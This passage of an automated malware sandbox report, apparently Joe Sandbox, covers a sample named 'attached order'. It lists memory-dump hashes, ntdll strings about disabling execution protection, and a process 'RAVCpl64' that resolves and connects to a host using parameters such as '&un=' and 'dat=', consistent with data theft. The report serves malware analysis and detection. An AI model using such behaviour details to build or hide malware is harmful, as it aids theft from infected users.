                                                                                          • Opcode Fuzzy Hash: b32b66a64eb686ce2550eafeac90f07ee095e5a4bc4a895fda5be1685579c209
                                                                                          • Instruction Fuzzy Hash: D7F0A031241A21DFDB327B18DC04B12F7E0EF14720F0146AEE067079E6CB31A886CA45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 578a038de86553e143bfd3f5ae5201bb99af27ed585e2f97a4fa87f9d5176253
                                                                                          • Instruction ID: d2b13da01d6c1869a5c3050a98629bb3f969e4d871c3255f2507c2c8b000aaeb
                                                                                          • Opcode Fuzzy Hash: 578a038de86553e143bfd3f5ae5201bb99af27ed585e2f97a4fa87f9d5176253
                                                                                          • Instruction Fuzzy Hash: B4E092321009549BC732BB18DC05F9AB7A9EFA0360F114128F11A575A6CB30AA10CBC4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fa8ce16c07ac1a25305b9be288611f20235365345bbd62948a09675b6926aa53
                                                                                          • Instruction ID: bb3b64c586f4ae5811b7672e6b64bccb342031ec92311a8509162eb407ee6e52
                                                                                          • Opcode Fuzzy Hash: fa8ce16c07ac1a25305b9be288611f20235365345bbd62948a09675b6926aa53
                                                                                          • Instruction Fuzzy Hash: 14D02B324562206BCB77A5397C14FE7BA5CDB42220F050871F848D2015D524CC81C6D4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                          • Instruction ID: e4746ad8fe97559feab249d22b12e7d380cf2411da12850ddd39602a90c2f200
                                                                                          • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                          • Instruction Fuzzy Hash: 22E0C231044621EFDB323B24DC04F51F6E1FF10710F2104BEF58A064FA8BB69882DA49
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                          • Instruction ID: 126c3bd40966871b5e336bedf78847af65716511b27e9d73b5c4d1cf685bead9
                                                                                          • Opcode Fuzzy Hash: 5663e0f35f59b4786cff651edfab4e0250af7e9ff0298b75044c79922af63661
                                                                                          • Instruction Fuzzy Hash: 52E08C31042A21EECF323A04DD08F62F6E2BB40B10F1149BEE116164A5CB79E8C6DA46
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                          • Instruction ID: e4c4903187e8af0065ceae7899f904db2af1c8dd02eed935c8318a8da1597fdb
                                                                                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                          • Instruction Fuzzy Hash: 84E08633115B1487C729DE18D516776B7A8FF45720F05423EAA5347790C534E544C7DA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                          • Instruction ID: 5319a0a14acb6092877f653f9bbc42ca26a89141058590b104597f07f0bef1e6
                                                                                          • Opcode Fuzzy Hash: 9eeef1791f682d1806daff088d782c605668e39cbad21fc7d49dd3969ced6bd8
                                                                                          • Instruction Fuzzy Hash: CFD05E32501A50AFC7325F0BEA04D53FBF9FBD4A107050A2EA54983920C770E802CBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                          • Instruction ID: f78e9e9d8b6654b5fb07c373f768319b3753e1959139070c6d5a9552ae99108e
                                                                                          • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                          • Instruction Fuzzy Hash: C9E0EC359506849FDB12DB59CA44F5AFBB5BB84B00F290458A5485B661DB24E900CB40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                          • Instruction ID: 682426c53b31f5daa6cc8504f6c9a5d45d6ca0ea179d1d510a201844d53be9df
                                                                                          • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                          • Instruction Fuzzy Hash: 04D0A932244A20ABC732AA2CFC00FC3B3E8BB88B21F020459B108C7051C364EC81C680
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                          • Instruction ID: 0578720a2fd1679337b7dee5945b0711368b3874da9d8f1db686aac3b120772a
                                                                                          • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                          • Instruction Fuzzy Hash: 06D0123220657197DB3966556914F67F915AB81A50F1A046DB90E93D04C6188C43D6E0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                          • Instruction ID: 1141e0ac861dc46f99c6eb852fba72c3ed1d2c22bfef793a29e1e3ed71f421f4
                                                                                          • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                          • Instruction Fuzzy Hash: 0ED012371D054DBBCB119F65DC01F957BA9E7A4B60F044020B508875A0CB3AE950D584
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d73a4e23389175182af8da67e747098645930fca66e83cfe59425484c3b197ff
                                                                                          • Instruction ID: b834ba0379ad31502124abc51eae982d255ace305dfd55ab6298d0941cf38f17
                                                                                          • Opcode Fuzzy Hash: d73a4e23389175182af8da67e747098645930fca66e83cfe59425484c3b197ff
                                                                                          • Instruction Fuzzy Hash: ADD0C934645A02DBDF3B9B44DA14F7EFBB8FF58741F8001A8EA4292961F329DD01DA90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 939b3fe64b4e98252efd999a762745ba4a47d0b94ffaa1562268bd1ecb549e16
                                                                                          • Instruction ID: b62d975ef8e8296314d243d7b5447df64f0f00227d62acf22eb86d6a25ec62e9
                                                                                          • Opcode Fuzzy Hash: 939b3fe64b4e98252efd999a762745ba4a47d0b94ffaa1562268bd1ecb549e16
                                                                                          • Instruction Fuzzy Hash: 7B9002213A500043D640725865186069005E7E1301F91D525E0408554CD92588566223
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7051fb0ccac77edd98a4a8f9fafd34b49e373804122d34761af06d64568bf49d
                                                                                          • Instruction ID: 457d44d504f63474772ed4674dd7f0755a94266a4e7acd2c6c84bca851a3a1d5
                                                                                          • Opcode Fuzzy Hash: 7051fb0ccac77edd98a4a8f9fafd34b49e373804122d34761af06d64568bf49d
                                                                                          • Instruction Fuzzy Hash: 939002292B700042D6807258650860A500597D1202FD1D929A0009558CC92588696322
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a32b3d5c0fd09bd1e0697f502e8442967c5dd0a032c4ce2b58ca6fc8c55a1721
                                                                                          • Instruction ID: 51e2e65826b3c0801428e0d7fc723769f346129d223a8d6af26f0b12eb66d838
                                                                                          • Opcode Fuzzy Hash: a32b3d5c0fd09bd1e0697f502e8442967c5dd0a032c4ce2b58ca6fc8c55a1721
                                                                                          • Instruction Fuzzy Hash: 999002212A904482D60076586508A06500597D0205F91D525A1058595DC6358851B132
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8ef539c5980812eccb205396c4e2311df8edb25231c343e8f01019e141079092
                                                                                          • Instruction ID: 4ecd7007c830780eadb34d0ed88273c9cb8f295c381158654ba8d74eb4dea85c
                                                                                          • Opcode Fuzzy Hash: 8ef539c5980812eccb205396c4e2311df8edb25231c343e8f01019e141079092
                                                                                          • Instruction Fuzzy Hash: 099002312A500443D60072586608707500597D0201F91D925A0418558DD66688517122
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 50ce8239120c7769d4eb80c66ec92157f1e702fb036ee28156ebb9d7bbd0254d
                                                                                          • Instruction ID: e76ea0c3d0bc0e1e126f394757e32e5de2bc326a8bd3816d4ae3d4482f1a126c
                                                                                          • Opcode Fuzzy Hash: 50ce8239120c7769d4eb80c66ec92157f1e702fb036ee28156ebb9d7bbd0254d
                                                                                          • Instruction Fuzzy Hash: 519002212E6041925A45B25855045079006A7E02417D1C526A1408950CC5369856E622
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19c1f914e597c8b9888d4095f07753a4463cb4f35a80159cc3648a25a1872def
                                                                                          • Instruction ID: d6e474b1a7f70a9ca46a6ff12abedbf0b1656bf8e480cb822296b4fab10d474b
                                                                                          • Opcode Fuzzy Hash: 19c1f914e597c8b9888d4095f07753a4463cb4f35a80159cc3648a25a1872def
                                                                                          • Instruction Fuzzy Hash: E19002312E500442D641725855046065009A7D0241FD1C526A0418554EC6658A56BA62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 633d0df01ce7743211cbc19e075bd4bedab7b6a67e0193298374bb080d4e8abf
                                                                                          • Instruction ID: 7b34ef101942b7f71ed423f88beaffc53cab221e3baf666c37e1382b88cc9aa1
                                                                                          • Opcode Fuzzy Hash: 633d0df01ce7743211cbc19e075bd4bedab7b6a67e0193298374bb080d4e8abf
                                                                                          • Instruction Fuzzy Hash: 249002212A544482D64073585904B0F910597E1202FD1C52DA414A554CC92588556722
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4422cbe6693ca58f284e609a33af6d0d06cdda0bd7998fd6941103daa45a5b36
                                                                                          • Instruction ID: 7f7f3848f5e4b076d0d6d762da2ee5d50c0a7d75c1a61eeff2c30de1d36e3539
                                                                                          • Opcode Fuzzy Hash: 4422cbe6693ca58f284e609a33af6d0d06cdda0bd7998fd6941103daa45a5b36
                                                                                          • Instruction Fuzzy Hash: 7B9002212B580082D70076685D14B07500597D0303F91C629A0148554CC92588616522
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2f5ae2951f69a7309456b63b93829a25d9821ce2d862e555668bc3b9727490ca
                                                                                          • Instruction ID: 26d9f118e2a22d1bc8cadb7bcbb8b848ea6426504060476cf70c2b7306ddabbd
                                                                                          • Opcode Fuzzy Hash: 2f5ae2951f69a7309456b63b93829a25d9821ce2d862e555668bc3b9727490ca
                                                                                          • Instruction Fuzzy Hash: B49002212E500842D640725895147075006D7D0601F91C525A0018554DC626896576B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25c773e42f6a9c60e426139f0373083f636462092b740cbdfba7114dc54e87fb
                                                                                          • Instruction ID: 270e8a4163c4282726ef2cee89e8c829a1a30e70c285baf328b4dc973f52d70d
                                                                                          • Opcode Fuzzy Hash: 25c773e42f6a9c60e426139f0373083f636462092b740cbdfba7114dc54e87fb
                                                                                          • Instruction Fuzzy Hash: E49002613E500482D60072585514B065005D7E1301F91C529E1058554DC629CC527127
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4d72e37ede629d44a0ef1ec67df78e9e001f23e13d334dea65625d232fe1a5ab
                                                                                          • Instruction ID: 143912dd03b5bc80197e302a7b867b8c900a57b5601c66aec67b03033ed1fd58
                                                                                          • Opcode Fuzzy Hash: 4d72e37ede629d44a0ef1ec67df78e9e001f23e13d334dea65625d232fe1a5ab
                                                                                          • Instruction Fuzzy Hash: F39002612A540443D64076585904607500597D0302F91C525A2058555ECA398C517136
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 97e1de946c0599779913a5157082701d8c2935d3a77a6c7698b95bc41c2ebbdb
                                                                                          • Instruction ID: 9b83f90c238606dc9a9bf3fca26625273c3b862d3f7196c29b9de282e5ecfd92
                                                                                          • Opcode Fuzzy Hash: 97e1de946c0599779913a5157082701d8c2935d3a77a6c7698b95bc41c2ebbdb
                                                                                          • Instruction Fuzzy Hash: 809002216A5000824640726899449069005BBE1211791C635A098C550DC56988656666
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a63c7ac71389c092c5888ce0632b677a876e1980689c7c9db9d0746a44c8f6f5
                                                                                          • Instruction ID: 440aec4a2b1688d88e7dadb0a94a8ec1a7b7df013fdef3f41a48adefe377dc6c
                                                                                          • Opcode Fuzzy Hash: a63c7ac71389c092c5888ce0632b677a876e1980689c7c9db9d0746a44c8f6f5
                                                                                          • Instruction Fuzzy Hash: 889002312A540442D60072585908747500597D0302F91C525A5158555EC675C8917532
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 430d6889182e2794226963145ca8fb9956932d4f2a35979dfa17613dffb5d578
                                                                                          • Instruction ID: 1044f3cae588a8b97fe7a09691604fe7b9de11e5c962e662694226566f09edea
                                                                                          • Opcode Fuzzy Hash: 430d6889182e2794226963145ca8fb9956932d4f2a35979dfa17613dffb5d578
                                                                                          • Instruction Fuzzy Hash: 259002612B500082D60472585504706504597E1201F91C526A2148554CC5398C616126
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 532d412334cdc3f62cae9abeb80c49ae7b256c6b4a6076ef613bc9ec70b4a456
                                                                                          • Instruction ID: 6ecf9c3b10c7a08a39e8137cdf3f7287c8a08a891faf78ba390392999fddb86a
                                                                                          • Opcode Fuzzy Hash: 532d412334cdc3f62cae9abeb80c49ae7b256c6b4a6076ef613bc9ec70b4a456
                                                                                          • Instruction Fuzzy Hash: 7F9002212E905142D650725C55046169005B7E0201F91C535A0808594DC56588557222
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d0f9ac2e312ace02f9cfaadc016007638acd226f9c847cbbd633d77d426e7f8
                                                                                          • Instruction ID: 95347b13d3958e4de1010e0a5e786f3e0fe71c71db5b1b48d798d27a1239b2dc
                                                                                          • Opcode Fuzzy Hash: 0d0f9ac2e312ace02f9cfaadc016007638acd226f9c847cbbd633d77d426e7f8
                                                                                          • Instruction Fuzzy Hash: 779002312A6001829A4073586904A4E910597E1302BD1D929A0009554CC92488616222
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e7e0af0a6b8c723d8fe7a91dd4d0777a757b1e8b5a80c70ec55e93b66ce6189c
                                                                                          • Instruction ID: e7235c4fc950644f84e9f76114d41502a6840955bfad3e56a1ab27ba7825bfa1
                                                                                          • Opcode Fuzzy Hash: e7e0af0a6b8c723d8fe7a91dd4d0777a757b1e8b5a80c70ec55e93b66ce6189c
                                                                                          • Instruction Fuzzy Hash: 9A9002352A500442DA1072586904646504697D0301F91D925A0418558DC66488A1B122
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction ID: c2aff08f369c2087fa1630c7049d713272216a638ccc4b609e1f18454ba46c8c
                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                          • Instruction Fuzzy Hash:
                                                                                          Strings
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 017A4592
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017A4507
                                                                                          • ExecuteOptions, xrefs: 017A44AB
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 017A4530
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 017A454D
                                                                                          • Execute=1, xrefs: 017A451E
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 017A4460
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@$@wv
                                                                                          • API String ID: 0-2230787357

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.8%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:29.1%
                                                                                          Total number of Nodes:55
                                                                                          Total number of Limit Nodes:5

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • getaddrinfo.WS2_32 ref: 03601D4D
                                                                                            • Part of subcall function 036095C8: connect.WS2_32 ref: 0360964B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: connectgetaddrinfo
                                                                                          • String ID: &br=$&un=$dat=
                                                                                          • API String ID: 2413327212-1268146196

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: M
                                                                                          • API String ID: 0-3664761504

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.17797622157.0000000003590000.00000040.80000000.00040000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_3590000_RAVCpl64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
